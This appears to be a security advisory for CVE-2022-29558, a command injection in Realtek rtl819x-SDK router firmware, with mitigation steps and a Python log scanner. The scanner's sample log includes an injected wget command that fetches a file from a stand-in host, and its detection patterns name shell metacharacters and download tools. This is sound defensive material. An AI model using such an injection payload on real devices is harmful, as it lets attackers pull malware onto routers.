CVE-2022-29558

8.8 HIGH

📋 TL;DR

CVE-2022-29558 is an OS command injection vulnerability in the web management interface of Realtek's rtl819x-SDK: input supplied through the web interface reaches a shell command unsanitized, so an attacker who can reach the interface with valid credentials can execute arbitrary commands on the device. On these embedded builds the web server normally runs as root, so command execution amounts to full device control. It affects routers and access points built on SDK versions before v3.6.1.

💻 Affected Systems

Products:
  • Realtek rtl819x-SDK based routers and access points
Versions: All versions before v3.6.1
Operating Systems: Embedded Linux systems
Default Config Vulnerable: ⚠️ Yes
Notes: Devices with web management interface enabled are vulnerable. Many consumer and SOHO routers use this SDK.

📦 What is this software?

Realtek's rtl819x-SDK is the firmware development kit Realtek supplies to the ODMs and OEMs that build Wi-Fi routers and access points on its RTL819x family of SoCs. It bundles an embedded Linux kernel, the wireless drivers and a ready-made web management interface (built on the Boa HTTP server) that vendors usually rebrand with few changes. A bug in the SDK is therefore inherited by many products sold under many brand names, and each one is fixed only when its own vendor rebuilds and ships firmware on the corrected SDK.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Complete device compromise allowing persistent backdoor installation, network pivoting, credential theft, and participation in botnets.

🟠 Likely Case

Remote code execution leading to device takeover, network traffic interception, and lateral movement within the network.

🟢 If Mitigated

Limited impact if the web interface is disabled or network segmentation prevents access to the vulnerable interface.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ❌ No
Complexity: LOW

Exploitation requires an authenticated session on the web management interface: an 8.8 score with high confidentiality, integrity and availability impact corresponds to the CVSS v3 "low privileges required" (PR:L) vector. Treat that as a weak barrier in practice. Many OEM firmwares ship with default or widely known admin credentials, and where those are unchanged anyone who can reach the interface can exploit the flaw.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: v3.6.1 or later

Vendor Advisory: https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2022-29558.pdf

Restart Required: Yes

Instructions:

1. Contact the device manufacturer for a firmware update: Realtek ships the fix to OEMs in the SDK, and only the OEM's rebuilt firmware carries it to a specific product.
2. Apply the firmware update to each affected device.
3. Reboot the device after the update.
4. Confirm the installed firmware is the build the vendor's advisory lists as based on SDK v3.6.1 or later (most OEM firmware version strings do not expose the SDK version directly).

🔧 Temporary Workarounds

Disable Web Management Interface

all

Disable the vulnerable web interface if not required for operations

Device-specific - consult manufacturer documentation

Network Segmentation

linux

Restrict access to the management interface using firewall rules: accept the administrative subnet first, then drop everyone else. The subnet 192.168.1.0/24 is a placeholder, and the ports must match what the web UI actually listens on. The rules are inserted at the top of INPUT with -I so an existing broad ACCEPT rule cannot shadow them; if the router gives you no shell, apply the equivalent filter on the upstream firewall in front of it.

iptables -I INPUT 1 -p tcp -m multiport --dports 80,443 -s 192.168.1.0/24 -j ACCEPT
iptables -I INPUT 2 -p tcp -m multiport --dports 80,443 -j DROP

🧯 If You Can't Patch

  • Implement strict network access controls so only the administrative network can reach the web interface, and make sure remote management is not enabled on the WAN side
  • Change default administrator credentials, since the exploit needs a session on the web interface
  • Monitor for suspicious web interface activity and command execution attempts

🔍 How to Verify

Check if Vulnerable:

Check device firmware against the vendor's advisory: firmware built on a Realtek SDK earlier than v3.6.1 is vulnerable. Because OEMs rebrand the SDK, you normally cannot read the SDK version from the device; the vendor's firmware release notes or the Realtek advisory are the authoritative mapping.

Check Version:

Device-specific. The firmware version string is typically shown on the web interface's status or about page. With shell access, cat /proc/version prints only the kernel build string (version, toolchain and build date), which identifies the firmware build but not the SDK release, so it is useful only for matching against a vendor statement.

Verify Fix Applied:

Verify firmware version shows SDK 3.6.1 or higher after update

📡 Detection & Monitoring

Log Indicators:

  • Form or query parameter values sent to web management endpoints that contain shell metacharacters (;, |, &, backticks, $( ), >, or their URL-encoded forms %3B, %7C, %26, %60, %24%28)
  • POST requests to management endpoints followed by unexpected process activity on the device (new shells, downloaders such as wget or tftp, new listeners)
  • Failed (401/403) as well as successful (200) requests carrying such payloads: a failed attempt still shows an attacker has found the interface

Network Indicators:

  • Unusual outbound connections from routers
  • Traffic to known malicious IPs from the router
  • Unexpected port scans originating from the router

SIEM Query:

A query keyed on literal strings such as "cmd=" or "system(" rarely fires: in a command injection the payload lives inside the value of an ordinary form parameter, and filtering on status=200 hides failed attempts. A pattern closer to what the attack looks like in a request log (Splunk-style pseudo-syntax; field names depend on your log source):

source="router_logs" method=POST (form_body="*;*" OR form_body="*|*" OR form_body="*`*" OR form_body="*$(*" OR form_body="*%3B*" OR form_body="*%7C*" OR form_body="*%60*" OR form_body="*%24%28*") | stats count by src_ip, user, uri_path, status

Most SOHO routers do not log request bodies at all; the practical place to collect this is a reverse proxy in front of the device, an IDS on the management segment, or a packet capture.
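The same detection logic run over sample log lines, as an added example: this is not Realtek's code and not part of the original advisory. It assumes a reverse proxy or IDS in front of the device writes a combined-format access log with the POST body appended as a final quoted field (the sample lines are constructed, and the /goform/example path is a placeholder, not a real SDK endpoint). It decodes every query and form parameter, flags values containing shell metacharacters, raises the severity when a known download or shell command follows the break-out, and reports hits regardless of HTTP status.

```python
"""Flag web-management requests whose parameters look like OS command injection."""
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample: combined-format access log with the POST body appended as a
# final quoted field. /goform/example is a placeholder path, not a real SDK endpoint.
SAMPLE_LOG = """\
192.168.1.50 - admin [12/May/2022:10:15:22 +0000] "POST /goform/example HTTP/1.1" 200 512 "host=8.8.8.8"
192.168.1.50 - admin [12/May/2022:10:15:40 +0000] "POST /goform/example HTTP/1.1" 200 512 "host=8.8.8.8;wget+http%3A%2F%2F198.51.100.7%2Fx+-O+%2Ftmp%2Fx"
203.0.113.9 - - [12/May/2022:10:16:01 +0000] "GET /goform/example?host=%60id%60 HTTP/1.1" 401 0 "-"
192.168.1.50 - admin [12/May/2022:10:16:30 +0000] "POST /goform/example HTTP/1.1" 200 512 "pin=12345670&name=My%20AP"
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \d+ "(?P<body>[^"]*)"$'
)
# Characters that let a parameter value break out of a system()/popen() command string.
META_RE = re.compile(r"[;|&`\n<>]|\$\(|\$\{")
# Tools an attacker typically chains in once the break-out works.
CMD_RE = re.compile(r"\b(wget|curl|tftp|busybox|nc|telnetd|sh|cat|echo|chmod|reboot)\b")


def decode_params(raw):
    """Split a query string or x-www-form-urlencoded body into decoded (name, value) pairs.
    Done by hand rather than with parse_qsl so that ';' survives as payload, not separator."""
    if not raw or raw == "-":
        return []
    pairs = []
    for field in raw.split("&"):
        name, _, value = field.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def classify(value):
    """'high' = metacharacter plus a known command, 'medium' = metacharacter only, None = clean."""
    if not META_RE.search(value):
        return None
    return "high" if CMD_RE.search(value) else "medium"


def scan_log(text):
    """Return one finding per request carrying a suspicious parameter, regardless of HTTP status:
    a 401/403 still shows someone probing the interface with a command-injection payload."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line in the expected shape
        target = urlsplit(m.group("target"))
        params = decode_params(target.query) + decode_params(m.group("body"))
        hits = [(n, v, classify(v)) for n, v in params if classify(v)]
        if hits:
            findings.append({
                "src": m.group("src"),
                "user": m.group("user"),
                "status": int(m.group("status")),
                "path": target.path,
                "severity": "high" if any(s == "high" for _, _, s in hits) else "medium",
                "params": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['src']} user={f['user']} status={f['status']} "
              f"{f['path']} {f['params']}")
```

Run against the sample it reports two findings: the authenticated POST that appends a wget download to a host field (high) and the unauthenticated GET probing with a backtick-wrapped command that the device rejected with 401 (medium). The clean requests, including one with a space in a name field, produce nothing, which is the point of keying on metacharacters rather than on words like "cmd".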
